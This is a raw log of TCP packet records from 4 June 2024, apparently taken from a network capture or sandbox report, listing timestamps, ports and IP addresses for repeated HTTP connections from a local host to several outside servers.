                                        Jun 4, 2024 14:39:27.802886963 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.026855946 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.027035952 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.028928995 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.253045082 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.253918886 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.253943920 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.254074097 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:29.533981085 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.552287102 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.780896902 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:30.781107903 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.783164978 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.012324095 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:31.012339115 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:31.012680054 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.015290976 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.243756056 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:36.019597054 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.136941910 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.137105942 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.139025927 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.256202936 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340501070 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340539932 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340603113 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340679884 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340703011 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.340828896 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.344685078 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.344768047 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.344810963 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.344860077 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.345067024 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.347004890 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.347029924 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.347081900 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.347182989 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.347191095 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.347489119 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.354372978 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.372483969 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.372507095 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.372545004 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.372560978 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.372658968 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.372658968 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.375008106 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.375078917 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.375133038 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.375149012 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.375163078 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.375335932 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.375830889 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.375986099 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.377330065 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.377358913 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.377417088 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.377432108 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.377520084 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.377624035 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.377979040 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384219885 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384251118 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384272099 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384301901 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384377956 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384385109 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.384449005 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.384592056 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.384630919 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384649992 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384727001 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.384891033 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.388921976 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.388942957 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.388991117 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389005899 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389111996 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389137983 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.389163971 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389240980 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389256954 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.389259100 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.389410973 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.389916897 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.390064955 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.405566931 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.405601978 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.405622959 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.405711889 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.405782938 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.405913115 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.406383038 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406495094 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406541109 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406593084 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406606913 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406707048 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.406769991 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.406939030 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.407727957 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.407871008 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:37.641585112 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:38.659713984 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:38.776854992 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:38.777014971 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:38.779052973 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:38.896289110 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.016335964 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.016354084 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.016390085 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.016442060 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.016632080 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.019067049 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.019171000 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.019239902 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.019275904 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.019314051 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.019375086 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.019525051 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.023550987 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.023597002 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.023657084 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.023674011 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.023695946 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.023864985 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.024167061 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.024306059 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.055775881 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.055844069 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.055902958 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.055922031 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.055938959 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056014061 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.056071997 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.056159973 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056263924 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056313038 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056313038 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.056349039 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056370974 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.056432962 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.056598902 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.057985067 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.058089972 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.058142900 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.058191061 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.058315039 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.058432102 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.059644938 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.059752941 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.059804916 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.059851885 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.059926987 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.059992075 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.060193062 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063173056 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063282013 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063334942 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063347101 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063383102 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.063457966 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.063571930 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.064867020 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.064975023 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.065030098 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.065042019 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.065126896 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.065393925 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.080930948 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.081042051 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.081056118 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.081064939 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.081173897 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.081203938 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.081423044 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.082142115 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.082274914 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.082288980 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.082298040 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.082344055 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.082488060 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.083539963 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.083550930 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.083713055 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:39.084644079 CEST804987323.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:39.084866047 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:40.281601906 CEST4987380192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.299494982 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.416606903 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.416757107 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.418387890 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.535510063 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713315964 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713335991 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713370085 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713388920 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713407993 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713426113 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713444948 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713464022 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713481903 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713500977 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713515997 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.713552952 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.713618040 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.713677883 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.725649118 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.725671053 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.725708008 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.725723982 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.725785971 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.725900888 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.728847980 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.728941917 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.728996038 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.728998899 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.729020119 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.729165077 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.731111050 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.731215000 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.731259108 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.731286049 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.731301069 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.731443882 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.731478930 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.731662035 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.735524893 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.735574961 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.735618114 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.735632896 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.735711098 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.735743999 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.737451077 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.737499952 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.737555027 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.737571001 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.737602949 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.737647057 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.737680912 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.737837076 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.741291046 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.741331100 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.741393089 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.741462946 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.741504908 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.741518974 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.741724014 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.743212938 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.743278027 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.743320942 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.743335962 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.743361950 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.743608952 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.744051933 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.744168043 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.761717081 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.761740923 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.761759996 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.761775017 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.761953115 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.763060093 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.763166904 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.763184071 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.763197899 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.763382912 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.763832092 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.763942957 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.764071941 CEST804987423.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:41.764148951 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:41.764206886 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:42.921509981 CEST4987480192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:43.939234972 CEST4987580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:44.069708109 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.070055962 CEST4987580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:44.071583986 CEST4987580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:44.202011108 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.255162001 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.255187988 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.255201101 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.255213976 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:44.255597115 CEST4987580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:44.259392977 CEST4987580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:44.389780998 CEST804987523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:49.269382954 CEST4987680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:49.477890968 CEST8049876217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:49.478045940 CEST4987680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:49.481605053 CEST4987680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:49.690016031 CEST8049876217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:49.691998959 CEST8049876217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:49.692018032 CEST8049876217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:49.692133904 CEST4987680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:50.997843981 CEST4987680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:52.018821955 CEST4987780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:52.229223967 CEST8049877217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:52.229423046 CEST4987780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:52.231210947 CEST4987780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:52.441585064 CEST8049877217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:52.443501949 CEST8049877217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:52.443521976 CEST8049877217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:52.443833113 CEST4987780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:53.747217894 CEST4987780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:54.765410900 CEST4987880192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:54.975955963 CEST8049878217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:54.976134062 CEST4987880192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:54.977902889 CEST4987880192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:55.188374996 CEST8049878217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:55.188414097 CEST8049878217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:55.190674067 CEST8049878217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:55.190687895 CEST8049878217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:55.190813065 CEST4987880192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:56.480959892 CEST4987880192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:57.499341965 CEST4987980192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:57.707308054 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:57.707467079 CEST4987980192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:57.709409952 CEST4987980192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:57.917335987 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:57.920452118 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:57.920466900 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:57.920483112 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:39:57.920788050 CEST4987980192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:57.924880028 CEST4987980192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:39:58.133003950 CEST8049879217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:40:35.679939032 CEST4988080192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:35.852502108 CEST8049880192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:35.852818012 CEST4988080192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:35.854449987 CEST4988080192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:36.026902914 CEST8049880192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:36.031620026 CEST8049880192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:36.031632900 CEST8049880192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:36.031878948 CEST4988080192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:37.362323999 CEST4988080192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:38.381567001 CEST4988180192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:38.547840118 CEST8049881192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:38.548100948 CEST4988180192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:38.550308943 CEST4988180192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:38.716589928 CEST8049881192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:38.719877005 CEST8049881192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:38.719888926 CEST8049881192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:38.720036983 CEST4988180192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:40.064927101 CEST4988180192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:41.083353996 CEST4988280192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:41.250272036 CEST8049882192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:41.250503063 CEST4988280192.168.11.30192.207.62.21
